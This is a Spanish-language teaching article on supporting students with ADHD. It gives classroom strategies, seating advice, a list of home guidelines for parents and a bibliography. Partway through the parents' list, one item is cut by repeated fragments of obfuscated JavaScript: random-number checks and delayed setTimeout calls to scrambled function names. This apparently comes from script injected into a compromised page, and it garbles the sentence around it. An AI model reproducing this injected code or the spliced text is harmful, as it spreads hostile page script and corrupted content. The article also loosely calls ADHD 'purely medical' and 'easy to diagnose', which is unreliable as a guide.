CÓMO TRATAR A ALUMNOS CON TDAH

Autora:  Cristina Pintor Portero

Los alumnos que presentan TDAH deben, como cualquier tipo de alumno, recibir una enseñanza de calidad, lo que significa que nosotros los docentes, junto con la ayuda de los psicopedagogos y las familias, tenemos que hacer todo lo posible para que esto suceda.

Según establece la Ley Orgánica 2/2006 de 3 de mayo y según el objetivo prioritario de la Consejería de Educación, la mejora de la calidad de enseñanza debe aplicarse a todo tipo de alumnado, incluyendo, por lo tanto a los alumnos con TDAH (Trastorno por Déficit de Atención con/sin  hiperactividad). Para conseguir esta calidad se necesitará un esfuerzo por parte tanto de docentes como de padres o tutores. Es importante detectar las peculiaridades, singularidades y necesidades para garantizar el aprendizaje junto a un desarrollo personal adecuado.

Al ser un trastorno puramente médico, es necesario contar con el apoyo de los familiares al igual que de los psicopedagogos correspondientes o EOEPS. A pesar del fácil y rápido diagnóstico, el proceso de aprendizaje es largo y difícil. Es por eso que hay una serie de cuestiones importantes a tener en cuenta.

Hoy en día, es muy fácil encontrar alumnos con dificultades de atención, lo que antes se llamaba a “un chico/a nervioso/a o inquieto/a” o incluso “hiperactivo”, hoy en día tiene otro nombre y se pueden encontrar trastornos con o sin hiperactividad. Además también existen más investigaciones y, por tanto, otros tratamientos. Ahora, es posible diferenciar varios tipos de conductas asociadas al TDAH: dificultades de aprendizaje, trastorno disocial, depresión, tics, síndrome de Tourette, trastorno obsesivo-compulsivo, trastorno bipolar maníaco-depresivo, etc.

Para tratar la enfermedad hay que hacerlo con tratamientos para controlar las reacciones y la psicología del niño. Sin embargo, tanto los familiares como los docentes deben intentar controlar las circunstancias ambientales y realizar programas de economía de fichas además de un contrato de contingencias en el que se establezca lo que se espera del niño, añadiendo cuáles serían sus consecuencias.

Los docentes deben utilizar materiales de tipo carpetas, calendarios, rotuladores de colores para marcar y organizar todo. También es necesario tener control de la evolución de estos alumnos, observar en qué tipo de situaciones muestran mejoras y en cuáles no. Es conveniente no olvidarse de apuntar las cosas en la pizarra o entregárselas por escrito ya que, si queremos que hagan alguna actividad y solamente lo decimos oralmente, pueden olvidarlo con facilidad. Es muy conveniente además, enseñarles a tomar notas y a organizarse  en la realización de trabajos.

A la hora de una exposición oral o de “explicar” en clase hay que:

-Utilizar frases cortas, claras, con construcciones sintácticas sencillas

-Focalizar la atención en los conceptos clave

-Presentar la idea principal explícitamente al principio de la explicación

-Instigar estrategias de categorización y de formación de imágenes mentales de los conceptos

-Proporcionar al alumnado un sistema de tutoría

En cuanto a la ubicación de un alumno con TDAH en la clase, es muy conveniente que se coloque cerca del profesor y de alumnos tranquilos, además de estar lejos de objetos que distraigan su atención (ventanas, puertas, etc.)

Es imprescindible que gracias al ambiente del aula el alumno se sienta integrado con el resto de sus compañeros, para ello, se les debe dar las mismas oportunidades, además de utilizar materiales que llamen la atención para que su memoria visual le ayude a memorizar mejor el vocabulario y otros conceptos

Para que no se sienta desplazado o diferente se le debe tratar a sabiendas de la enfermedad que tiene, de la misma manera que a los demás, aunque con un poco más de atención, ya que su capacidad de aprendizaje no es la misma que la del resto de sus compañeros.

En resumen, la relación entre el profesor y alumno debe ser positiva, basada en la comprensión del profesor acerca del niño y su trastorno, debe ser capaz de determinar una notable mejoría académica y social en el niño.

Sin embargo, no sólo es tarea del profesor la de controlar la evolución de un alumno que presenta TDAH, sino que es además imprescindibles que los padres sigan una serie de pautas para mejorar la conducta de su hijo o hija. Por ejemplo:

-          Hacer un horario

-          Simplificar las reglas de la casa

-          Asegurarse de que las instrucciones son comprendidas

-          Premiar el buen comportamiento

-          Asegurarse de que el niño es supervisado en todo momento

-          Actuar siempre como modelo positivo

-          Comunicar los cambios y modificaciones

-          Aceptar al niño tal y como es

-          Comentar con el niño los fallos

-          Elogiar y reforzar las buenas conductas y habilidades del niño

-          Actuar con firmeza ante los comportamientos no deseados o disruptivos

-          Fijarse cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el niño está alrededor de sus amigos o amigas

-          Fijar una rutina para hacer la tarea

-          Concentrarse en el esfuerzo y no en las calificaciones

-          Hablar del niño con los maestros

En resumen, para tratar a alumnos con Trastorno por Déficit de Atención con o sin hiperactividad, es necesario conocer qué tipo de trastorno posee para poder tratarlo médicamente. Sin embargo, este tratamiento no debe ser el único, sino que el docente y la familia deben aportar todo lo posible para que el alumno pueda adquirir los conceptos necesarios sin tener que ser tratado especialmente, ya que debe sentirse como uno más de sus compañeros. Tener un trastorno de atención no debe ser sinónimo de fracaso escolar.

BIBLIOGRAFÍA:

-          LEDO CALVO, Mª DEL PILAR; MUÑOZ CARVAJAL, Mª DOLORES; BOLLOS BAENA, FRANCISCO JAVIER (2011) “Intervención con alumnos/as con TDAH en el ámbito escolar” [curso online]

-          Ley Orgánica de educación 2/2006 de 3 de mayo

-          http://www.postadopcion.org/pdfs/GUIApracticaTDAH.pdf [online]

-          Wikipedia online (2011) http://es.wikipedia.org/wiki/Trastorno_por_d%C3%A9ficit_de_atenci%C3%B3n_con_hiperactividad

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